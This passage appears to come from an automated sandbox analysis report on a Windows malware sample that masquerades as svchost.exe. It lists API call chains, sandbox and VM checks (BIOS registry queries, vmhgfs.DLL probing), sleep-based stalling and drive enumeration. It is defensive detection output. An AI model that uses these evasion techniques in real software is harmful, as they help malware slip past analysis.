SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,9_2_00A27020
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,9_2_00A3B810
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,9_2_00A39860
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,9_2_00A21180
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,9_2_00A2C9F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,9_2_00A411C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,9_2_00A41150
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,9_2_00A40BE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,9_2_00A42320
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,9_2_00A344F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,9_2_00A42590
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,9_2_00A3FDC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,9_2_00A23510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,9_2_00A21670
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,9_2_00A3FFE0
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403900
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date2_2_00403900
Found evasive API chain (may stop execution after checking volume information)
Source: C:\Users\user\Desktop\UMwpXhA46R.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-29896
Found evasive API chain checking for user administrative privileges
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-29929
Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_2-81097
Found stalling execution ending in API Sleep call
Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_2-80923
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00401A30 rdtsc 0_2_00401A30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02C76A30
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1484Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2646Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1304Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2834Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C864A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_02C864A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012564A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_012564A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010564A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,7_2_010564A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A364A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,9_2_00A364A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeAPI coverage: 2.7 %
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeAPI coverage: 2.9 %
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeAPI coverage: 2.7 %
Source: C:\Windows\apppatch\svchost.exe TID: 2836Thread sleep count: 1484 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 2836Thread sleep time: -148400s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7992Thread sleep count: 2646 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7992Thread sleep time: -264600s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7996Thread sleep count: 1304 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7996Thread sleep time: -130400s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7992Thread sleep count: 2834 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7992Thread sleep time: -283400s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 3132Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,2_2_02C9BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02C97CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125BBE9
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01267CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_01267CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0126BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,6_2_0126BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012466D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_012466D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105BBE9
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01067CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,7_2_01067CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0106BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,7_2_0106BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010466D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,7_2_010466D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3BBE9
